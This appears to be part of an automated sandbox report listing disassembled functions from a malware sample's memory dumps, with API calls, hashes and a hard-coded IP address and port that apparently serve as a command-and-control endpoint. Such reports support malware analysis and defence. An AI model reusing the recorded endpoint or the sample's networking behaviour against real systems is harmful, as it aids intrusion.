                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF0907194220DAFDF00EFE1E86A7EEB7B8F705316F50439AD90492245D7BA0149CFA1
                                                                                                                                                                      Function 02C63200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                      • String ID: 118.107.44.219$19091
                                                                                                                                                                      • API String ID: 3472027048-838246116
                                                                                                                                                                      • Opcode ID: 9ea87c5ef0dcdad0ef8ab28e110aea98ae29ed0e74c75b05da43252c6351d325
                                                                                                                                                                      • Instruction ID: c160f10b7608576721941f53baf1d4097a1e32d294398dffc054f09d630ce3f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ea87c5ef0dcdad0ef8ab28e110aea98ae29ed0e74c75b05da43252c6351d325
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD022B0A401218BBB28950188E8536B375FE8035C3680A28F88383280C2A46C0CDAA1
                                                                                                                                                                      Function 0377F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 0377F969
                                                                                                                                                                        • Part of subcall function 03783DE2: GetLastError.KERNEL32(00000001,00000000,0377F920,0377F6FC,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 03783DE6
                                                                                                                                                                        • Part of subcall function 03783DE2: ___set_flsgetvalue.LIBCMT ref: 03783DF4
                                                                                                                                                                        • Part of subcall function 03783DE2: __calloc_crt.LIBCMT ref: 03783E08
                                                                                                                                                                        • Part of subcall function 03783DE2: DecodePointer.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783E22
                                                                                                                                                                        • Part of subcall function 03783DE2: GetCurrentThreadId.KERNEL32 ref: 03783E38
                                                                                                                                                                        • Part of subcall function 03783DE2: SetLastError.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783E50
                                                                                                                                                                      • __freeptd.LIBCMT ref: 0377F973
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsGetValue.KERNEL32(?,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FC7
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsGetValue.KERNEL32(?,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FD9
                                                                                                                                                                        • Part of subcall function 03783FA6: DecodePointer.KERNEL32(00000000,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FEF
                                                                                                                                                                        • Part of subcall function 03783FA6: __freefls@4.LIBCMT ref: 03783FFA
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsSetValue.KERNEL32(00000027,00000000,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 0378400C
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F97C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                      • Opcode ID: fa6bba0e4a0819c9d698dc117b4b5120bafe0cba757d0a2ece7c0adcb024d0d7
                                                                                                                                                                      • Instruction ID: a18446dcb51674a5b7cac35df84adc5c54e42be978558057fc828081383ea2e2
                                                                                                                                                                      • Opcode Fuzzy Hash: fa6bba0e4a0819c9d698dc117b4b5120bafe0cba757d0a2ece7c0adcb024d0d7
                                                                                                                                                                      • Instruction Fuzzy Hash: AFC08C2C004308BBAB147736890C90A3A1C8D806107140110E8048D040DE28DC0184A0
                                                                                                                                                                      Function 02C67156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 02C6715B
                                                                                                                                                                        • Part of subcall function 02C69896: GetLastError.KERNEL32(00000001,00000000,02C67112,02C66F0C,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C6989A
                                                                                                                                                                        • Part of subcall function 02C69896: ___set_flsgetvalue.LIBCMT ref: 02C698A8
                                                                                                                                                                        • Part of subcall function 02C69896: __calloc_crt.LIBCMT ref: 02C698BC
                                                                                                                                                                        • Part of subcall function 02C69896: DecodePointer.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C698D6
                                                                                                                                                                        • Part of subcall function 02C69896: GetCurrentThreadId.KERNEL32 ref: 02C698EC
                                                                                                                                                                        • Part of subcall function 02C69896: SetLastError.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C69904
                                                                                                                                                                      • __freeptd.LIBCMT ref: 02C67165
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsGetValue.KERNEL32(?,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69A79
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsGetValue.KERNEL32(?,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69A8B
                                                                                                                                                                        • Part of subcall function 02C69A58: DecodePointer.KERNEL32(00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69AA1
                                                                                                                                                                        • Part of subcall function 02C69A58: __freefls@4.LIBCMT ref: 02C69AAC
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69ABE
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C6716E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                      • Opcode ID: 90ad55282cb3a93e9c525e02be2f411172c77f3eaab39ca0aa3236865801c83c
                                                                                                                                                                      • Instruction ID: 1e71de73bc8c45b87c428a29b889b518d08ce019139493e91afc4d83aaebf2d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 90ad55282cb3a93e9c525e02be2f411172c77f3eaab39ca0aa3236865801c83c
                                                                                                                                                                      • Instruction Fuzzy Hash: F1C08C205402086B8B1037368C4C92A3A9E8E84345B904810B80881000DE30D8009990
                                                                                                                                                                      Function 035F01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 035F022B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                      • Instruction ID: 356acae60e1b1e58dc8b73fab7ea4f92e4ade7f9201a28bf6f9450f51ac883f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                      • Instruction Fuzzy Hash: EAA14D74A00606EFDB14CFA9D884AAEF7B5FF48304B1C85A9E615D72A2D730E951CB90
                                                                                                                                                                      Function 03773360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                      • Opcode ID: 8fdd0e42fa778971983f8415cc3cf240560d56fe80e8067dd0294c5d5afc4583
                                                                                                                                                                      • Instruction ID: e81499e784ecd6e7e3df8a6a1217b8043d90441fd39adc0e2248ba5ad8f27c02
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdd0e42fa778971983f8415cc3cf240560d56fe80e8067dd0294c5d5afc4583
                                                                                                                                                                      • Instruction Fuzzy Hash: B351D27A700205AFEB25DF69C8C4A7AB7A9BF48214758866CE9198B700DB31F851DBD0
                                                                                                                                                                      Function 02C63350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                      • Opcode ID: 964d5c23b93ad1fd88f8810c494dbfeff016007414801962d54d6f63d524a06a
                                                                                                                                                                      • Instruction ID: b1a2d83b4ae198b5b19ef9d519d94a52e9db274f8616415e5d935c0489c00e50
                                                                                                                                                                      • Opcode Fuzzy Hash: 964d5c23b93ad1fd88f8810c494dbfeff016007414801962d54d6f63d524a06a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A5191727002419FD715CF69C8C8A7AFBA6BF8471471886A8D91ADBB04DB31E951CB90
                                                                                                                                                                      Function 03772FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03773043
                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 03773064
                                                                                                                                                                        • Part of subcall function 0377F91B: __getptd_noexit.LIBCMT ref: 0377F91B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                      • Opcode ID: 35d027ef3d27a7907c87b1f59581c5c40052ffe9d4584c391ed9cc9d0efc4a60
                                                                                                                                                                      • Instruction ID: fce64530ebef643d6e26da25074edaa3b3b6920b653cc86c5633dec739d96ff7
                                                                                                                                                                      • Opcode Fuzzy Hash: 35d027ef3d27a7907c87b1f59581c5c40052ffe9d4584c391ed9cc9d0efc4a60
                                                                                                                                                                      • Instruction Fuzzy Hash: CC21807960030CDFEF20EF69DC88B9A77A5EF05310F1845A5E5489F290D7B0A985DBE1
                                                                                                                                                                      Function 02C62FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C63023
                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 02C63044
                                                                                                                                                                        • Part of subcall function 02C6710D: __getptd_noexit.LIBCMT ref: 02C6710D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                      • Opcode ID: d6b93dca6c29d064242a30314b8d76a902a3e8752dfc7911044515842cd16b5e
                                                                                                                                                                      • Instruction ID: 941b35982562b007a0720e20197fe37e33bc6ec8d387d2e27fc0bb2aed31c0d6
                                                                                                                                                                      • Opcode Fuzzy Hash: d6b93dca6c29d064242a30314b8d76a902a3e8752dfc7911044515842cd16b5e
                                                                                                                                                                      • Instruction Fuzzy Hash: DE219470A00248DBDB209F68DCCCBBA7775EF45B14F2005E5E5056B190DB70AA88CFA1
                                                                                                                                                                      Function 03773260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • send.WS2_32(?,?,00040000,00000000), ref: 03773291
                                                                                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 037732CE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      • Opcode ID: 37255dec2a52a9bbe305b23dda70a38d4b2faf5dde60a8bf125d35fdc9d13d85
                                                                                                                                                                      • Instruction ID: 67d0d2c257361927988ca79cec8dccdd5bdbe8c4e79dde01ab48141354fefec7
                                                                                                                                                                      • Opcode Fuzzy Hash: 37255dec2a52a9bbe305b23dda70a38d4b2faf5dde60a8bf125d35fdc9d13d85
                                                                                                                                                                      • Instruction Fuzzy Hash: F311257AB01304B7EB20CA2ADC89B4AB799FB45260F144135E90CD7280D2319841A294
                                                                                                                                                                      Function 037730E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                      • Opcode ID: 6d055f9805eaabbe867f27ee9eacca435e3613f3668d224aef24466d6a48212c
                                                                                                                                                                      • Instruction ID: 78b7173f9dc8e912439b4cdd00b56f287b75264c07d1657f27e1a850fbc0e5ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d055f9805eaabbe867f27ee9eacca435e3613f3668d224aef24466d6a48212c
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01F239200A0ABFEB11DF28C8C8B69F7B9FB99301F184265D1048B680D735A9C6D7D1
                                                                                                                                                                      Function 02C630C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                      • Opcode ID: d082fb474ebb313fc72161d63944bdeb1d2865c20000a222dde212ebea33bff2
                                                                                                                                                                      • Instruction ID: 79be14d199ba0122bfe72a809659cda838c788076b6c421e60b9b7b1da716001
                                                                                                                                                                      • Opcode Fuzzy Hash: d082fb474ebb313fc72161d63944bdeb1d2865c20000a222dde212ebea33bff2
                                                                                                                                                                      • Instruction Fuzzy Hash: B901DF31A04246AFD710CF29D8C8BBDB3B9FB99745F1442A8D5008B2C0C771AADAC7E1
                                                                                                                                                                      Function 0377CD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,0377E04E,00000000,03779800,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 0377CD1B
                                                                                                                                                                      • _free.LIBCMT ref: 0377CD56
                                                                                                                                                                        • Part of subcall function 03771280: __CxxThrowException@8.LIBCMT ref: 03771290
                                                                                                                                                                        • Part of subcall function 03771280: DeleteCriticalSection.KERNEL32(00000000,0377D3E6,03796624,?,?,0377D3E6,?,?,?,?,03795A40,00000000), ref: 037712A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                      • Opcode ID: 33091f0acf424e88166b912c5d2b713733a47861a4ff24006bc4b9e0a6362f71
                                                                                                                                                                      • Instruction ID: ce11d0cc9bf4041513ec6f380d7c1bd94e8ccc28b4f5eeadf086d8492a478306
                                                                                                                                                                      • Opcode Fuzzy Hash: 33091f0acf424e88166b912c5d2b713733a47861a4ff24006bc4b9e0a6362f71
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D017AB0A00B449FC731DF6A9844A07FAE8BF98700B504A2ED2DACAA10D374A106CF55
                                                                                                                                                                      Function 02C66410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C65AF2), ref: 02C6642B
                                                                                                                                                                      • _free.LIBCMT ref: 02C66466
                                                                                                                                                                        • Part of subcall function 02C61280: __CxxThrowException@8.LIBCMT ref: 02C61290
                                                                                                                                                                        • Part of subcall function 02C61280: DeleteCriticalSection.KERNEL32(00000000,?,02C77E78), ref: 02C612A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                      • Opcode ID: 69f10b178c29e316d30315dd41d96f4b440d41a5eba0ae3ab2624229b378e726
                                                                                                                                                                      • Instruction ID: 4645c120701d48d9bd9568b6ceca6560b7d0e2f4a88f3b5c50e18c8a04998a11
                                                                                                                                                                      • Opcode Fuzzy Hash: 69f10b178c29e316d30315dd41d96f4b440d41a5eba0ae3ab2624229b378e726
                                                                                                                                                                      • Instruction Fuzzy Hash: 36013EF0A00B409FD720DF6A9884A57FAF9FF98711B104A1ED6DAC7A10D374A145CF95
                                                                                                                                                                      Function 0377E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0377DF10,00000000,00000000,00000000), ref: 0377E49B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03781168,?,?,?,?,?,?,03796298,0000000C,03781210,?), ref: 0377E4A9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1891408510-0
                                                                                                                                                                      • Opcode ID: 16af5033599bcb4c7f1846817a4579b82fc56260173746758418cbd1f9205ad0
                                                                                                                                                                      • Instruction ID: c09ab8913bb0f1e06356b0a0c1541686ab956174c40672b45f1bf2682ac5c3e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 16af5033599bcb4c7f1846817a4579b82fc56260173746758418cbd1f9205ad0
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BE05BB054420DBFEF10FB54AC84E3673DCD704330B118757F920D2289D539D851C6A0
                                                                                                                                                                      Function 0377F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0377F98F
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                        • Part of subcall function 0377F964: __getptd_noexit.LIBCMT ref: 0377F969
                                                                                                                                                                        • Part of subcall function 0377F964: __freeptd.LIBCMT ref: 0377F973
                                                                                                                                                                        • Part of subcall function 0377F964: ExitThread.KERNEL32 ref: 0377F97C
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 0377F9B0
                                                                                                                                                                        • Part of subcall function 0378418F: __getptd_noexit.LIBCMT ref: 03784195
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 418257734-0
